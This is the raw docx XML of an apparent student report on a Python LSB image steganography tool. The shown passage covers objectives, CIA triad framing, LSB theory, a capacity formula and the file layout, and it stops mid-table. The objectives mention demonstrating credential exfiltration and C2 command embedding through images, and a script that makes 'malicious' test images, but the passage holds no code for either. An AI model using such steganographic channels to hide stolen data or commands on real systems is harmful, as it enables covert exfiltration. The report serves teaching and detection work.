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C"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>IMAGE STEGANOGRAPHY TOOL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Information Security Project Report</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4536"/>
        <w:gridCol w:w="4536"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Course</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Information Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Topic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Steganography – Hiding Data in Images</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Python 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Key Library</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Pillow (PIL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDDDDD"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Steganography is the practice of concealing information within ordinary, non-secret data so that the very existence of the hidden message remains undetected. Unlike cryptography, which scrambles a message so it cannot be read, steganography hides the message so it cannot be seen. The word originates from the Greek words steganos (covered) and graphein (writing).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This project implements a Python-based Image Steganography Tool that exploits the Least Significant Bit (LSB) technique to embed arbitrary text messages inside digital images. The tool demonstrates a practical application of the CIA Triad — with a primary focus on Confidentiality — and also touches on digital forensics by providing a detection (steganalysis) capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. OBJECTIVES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The project was designed to achieve the following goals:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement LSB steganography to embed secret text inside PNG/JPG images without visible distortion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Provide a message extraction (decoding) function to retrieve hidden text from encoded images.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Implement a basic steganalysis / detection feature that scans a directory and flags images containing hidden data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Demonstrate real-world information-security attack scenarios such as credential exfiltration and C2 command embedding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Deliver a clean, menu-driven command-line interface for ease of use and demonstration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Include an automated test suite verifying encode → decode → detect correctness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. BACKGROUND &amp; THEORY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.1  The CIA Triad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The CIA Triad is the cornerstone model of information security, comprising three principles:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3024"/>
        <w:gridCol w:w="3024"/>
        <w:gridCol w:w="3024"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Principle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Relevance to This Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ensuring information is accessible only to authorised parties.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Primary focus. LSB encoding keeps the message invisible to casual observers.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D5E8F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Safeguarding the accuracy and completeness of data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The delimiter (###END###) ensures the extracted message matches the original exactly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1872"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ensuring authorised users can access information when needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The encode/decode pair guarantees the hidden data can always be retrieved from a valid encoded image.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.2  Least Significant Bit (LSB) Steganography</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Each pixel in an RGB image contains three colour channels — Red, Green, and Blue — each represented by an 8-bit integer (0–255). The LSB of each channel contributes only 1/255 of the total colour intensity; changing it produces a colour difference that is imperceptible to the human eye.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The encoding process replaces the LSB of consecutive channel values with individual bits of the secret message. For a W×H image, the maximum payload capacity is:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Capacity  =  (W × H × 3) ÷ 8  characters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>A unique end-of-message delimiter (###END###) is appended to the plaintext before encoding. During decoding, the tool reads LSBs sequentially and reconstructs characters until the delimiter is encountered, preventing garbage data from being returned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1A3A5C"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4. SYSTEM ARCHITECTURE &amp; DESIGN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.1  Project File Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Information-Security-Project/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>├── main.py               # Menu-driven CLI entry point</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>├── steganography.py      # Core LSB encode / decode / detect logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>├── setup_images.py       # Generates clean + malicious test images</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>├── test_steganography.py # Automated unit tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>├── requirements.txt      # Pillow==10.3.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="432"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E4D2B"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>└── images/               # Working directory for all image files</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.2  Module Responsibilities</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4536"/>
        <w:gridCol w:w="4536"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>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7344"/>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Responsibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>steganography.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
